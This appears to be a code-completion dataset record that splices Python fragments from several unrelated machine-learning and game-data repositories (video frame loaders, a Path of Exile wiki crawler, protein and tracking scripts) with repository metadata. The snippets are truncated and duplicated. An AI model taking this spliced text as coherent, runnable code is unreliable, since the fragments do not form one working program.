elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size)
|
decord.bridge.set_bridge("torch")
class VideoRandomSquareCrop(object):
def __init__(self, crop_size, p=0.5):
assert isinstance(crop_size, int)
self.crop_size = crop_size
self.p = p
def __call__(self, video):
"""
Args:
img (torch.tensor): video to be cropped.
Returns:
torch.tensor: cropped video.
"""
if isinstance(video, torch.Tensor):
if len(video.shape) == 4:
b, t, h, w = video.shape
else:
raise RuntimeError('Expecting 4-dimensional tensor of shape (b,t,h,w), got {}'.format(video.shape))
# if random.uniform(0, 1) < self.p:
# video = torch.flip(video, (3,))
x = random.randint(0, h - self.crop_size)
y = random.randint(0, w - self.crop_size)
return video[:, :, x: x + self.crop_size, y: y + self.crop_size]
else:
raise NotImplementedError('Support only torch.Tensor as input, got {}'.format(type(video)))
class ImageNorm(object):
"""Apply Normalization to Image Pixels on GPU
"""
def __init__(self, mean, std):
self.mean = torch.tensor(mean).view(1, 3, 1, 1)
self.std = torch.tensor(std).view(1, 3, 1, 1)
def __call__(self, img):
if torch.max(img) > 1 and self.mean.max() <= 1:
img.div_(255.)
return img.sub_(self.mean).div_(self.std)
def load_jsonl(filename):
with open(filename, "r") as f:
return [json.loads(l.strip("\n")) for l in f.readlines()]
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size) | self.video_rand_aug = TemporalConsistentRandomAugment(N=2, M=5, augs=['Identity', 'Contrast','Brightness','Sharpness', 'ShearX', 'ShearY', 'TranslateX', 'TranslateY', 'Rotate', 'HorizontalFlip']) | 2 | 2023-10-29 12:09:38+00:00 | 4k |
flbraun/poe-palette | data/wiki.py | [
{
"identifier": "League",
"path": "data/leagues.py",
"snippet": "class League:\n type_: LeagueType\n title: str # e.g. \"Ancestor\"\n slug: str # e.g. \"ancestor\"\n is_hardcore: bool"
},
{
"identifier": "NinjaCategory",
"path": "data/ninja.py",
"snippet": "class NinjaIndex... | import http
import itertools
import pprint
from collections.abc import Generator
from tabulate import tabulate
from .leagues import League
from .ninja import NinjaCategory, get_ninja_index, make_ninja_url
from .trade import automake_trade_url
from .types import Rarity
from .utils import Entry, LoggedRequestsSession, make_poedb_url, make_wiki_url | 3,016 | 'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
|
def iter_wiki_query(**cargo_params: dict[str, str]) -> Generator[dict, None, None]:
page_size = 500
offset = 0
session = LoggedRequestsSession()
while True:
res = session.get(
'https://www.poewiki.net/w/api.php',
params={
'action': 'cargoquery',
'format': 'json',
'offset': offset,
'limit': page_size,
**cargo_params,
},
)
assert res.status_code == http.HTTPStatus.OK
res_decoded = res.json()
try:
result_page = res_decoded['cargoquery']
except KeyError:
# unexpected message format, probably the query was bad.
# print full response for debugging.
pprint.pprint(res_decoded)
raise
result_page_len = len(result_page)
yield from result_page
# partial page indicates that there won't be a next page; stop crawling
if result_page_len < page_size:
break
offset += result_page_len
WIKI_ITEM_BLACKLIST: set[str] = { # items to completely ignore when importing from wiki (e.g. test data)
'Тест',
'Test',
'{{subst:PAGENAME}}',
"Booby Lady's Gloves",
'His Judgement', # seems to be in game files, but smells fishy
}
KNOWN_NINJA_UNLISTED_NAMES: set[str] = { # item names that are never listed on ninja
# non-armour/weapon base types
'Contract: Bunker',
'Contract: Laboratory',
'Contract: Mansion',
'Contract: Prohibited Library',
'Contract: Records Office',
'Contract: Repository',
"Contract: Smuggler's Den",
'Contract: Tunnels',
'Contract: Underbelly',
'Blueprint: Bunker',
'Blueprint: Laboratory',
'Blueprint: Mansion',
'Blueprint: Prohibited Library',
'Blueprint: Records Office',
'Blueprint: Repository',
"Blueprint: Smuggler's Den",
'Blueprint: Tunnels',
'Blueprint: Underbelly',
'Amethyst Flask',
'Aquamarine Flask',
'Basalt Flask',
'Bismuth Flask',
'Corundum Flask',
'Diamond Flask',
'Gold Flask',
'Granite Flask',
'Iron Flask',
'Jade Flask',
'Quartz Flask',
'Quicksilver Flask',
'Ruby Flask',
'Sapphire Flask',
'Silver Flask',
'Stibnite Flask',
'Sulphur Flask',
'Topaz Flask',
'Colossal Life Flask',
'Divine Life Flask',
'Eternal Life Flask',
'Giant Life Flask',
'Grand Life Flask',
'Greater Life Flask',
'Hallowed Life Flask',
'Large Life Flask',
'Medium Life Flask',
'Sacred Life Flask',
'Sanctified Life Flask',
'Small Life Flask',
'Colossal Mana Flask',
'Divine Mana Flask',
'Eternal Mana Flask',
'Giant Mana Flask',
'Grand Mana Flask',
'Greater Mana Flask',
'Hallowed Mana Flask',
'Large Mana Flask',
'Medium Mana Flask',
'Sacred Mana Flask',
'Sanctified Mana Flask',
'Small Mana Flask',
'Colossal Hybrid Flask',
'Hallowed Hybrid Flask',
'Large Hybrid Flask',
'Medium Hybrid Flask',
'Sacred Hybrid Flask',
'Small Hybrid Flask',
'Candlestick Relic',
'Censer Relic',
'Coffer Relic',
'Papyrus Relic',
'Processional Relic',
'Tome Relic',
'Urn Relic',
'Large Cluster Jewel',
'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
| display_text = name if ninja_category is not NinjaCategory.UNIQUE_MAPS else f'{name} {base_item}' | 1 | 2023-10-27 11:33:43+00:00 | 4k |
ATR-DBI/CityRefer | models/refnet.py | [
{
"identifier": "MultiHeadAttention",
"path": "models/transformer.py",
"snippet": "class MultiHeadAttention(nn.Module):\n '''\n Multi-head attention layer with Dropout and Layer Normalization.\n '''\n\n def __init__(self, d_model, d_k, d_v, h, dropout=.1, identity_map_reordering=False, can_b... | import random
import torch
import torch.nn as nn
import torchsparse.nn as spnn
from torch.nn.utils.rnn import pad_sequence
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchsparse.utils.collate import sparse_collate
from models.transformer import MultiHeadAttention
from models.basic_blocks import SparseConvEncoder
from models.landlang_module import LandLangModule | 2,012 |
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone
|
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone | self.sparse_conv = SparseConvEncoder(input_feature_dim) # self.input_feature_dim = 3 -> 128 | 1 | 2023-10-25 10:02:28+00:00 | 4k |
OATML-Markslab/ProteinNPT | baselines/data_processing.py | [
{
"identifier": "slice_sequences",
"path": "utils/data_utils.py",
"snippet": "def slice_sequences(list_mutant_mutated_seq_pairs, max_positions=1024, method=\"rolling\", rolling_overlap=100, eval_mode=True, batch_target_labels=None, batch_masked_targets=None, target_names=None, start_idx=1, num_extra_tok... | import sys
import numpy as np
import h5py
import torch
from collections import defaultdict
from utils.data_utils import slice_sequences, get_indices_retrieved_embeddings
from utils.msa_utils import weighted_sample_MSA | 1,663 |
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed postion of the first residue in the sequence. If full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None:
|
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed postion of the first residue in the sequence. If full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None: | model.MSA_sample_sequences = weighted_sample_MSA( | 2 | 2023-10-28 11:41:05+00:00 | 4k |
dyhBUPT/iKUN | test.py | [
{
"identifier": "opt",
"path": "opts.py",
"snippet": "class opts:\n def __init__(self):\n def parse(self, args=''):"
},
{
"identifier": "get_model",
"path": "model.py",
"snippet": "def get_model(opt, name='Model'):\n model = eval(name)(opt)\n model.cuda()\n model = nn.Data... | import os
import json
import shutil
import numpy as np
import torch
import torch.nn.functional as F
import warnings
from tqdm import tqdm
from os.path import join, exists
from collections import defaultdict
from torch import nn
from torchvision.utils import save_image
from opts import opt
from utils import *
from model import get_model
from dataloader import get_dataloader, get_transform
from similarity_calibration import similarity_calibration | 2,691 | if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
给定`test_tracking`输出的结果,生成最终跟踪结果
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO:可删
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path):
|
warnings.filterwarnings('ignore')
# import `opts` first to set gpus
def test_accuracy_v1(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
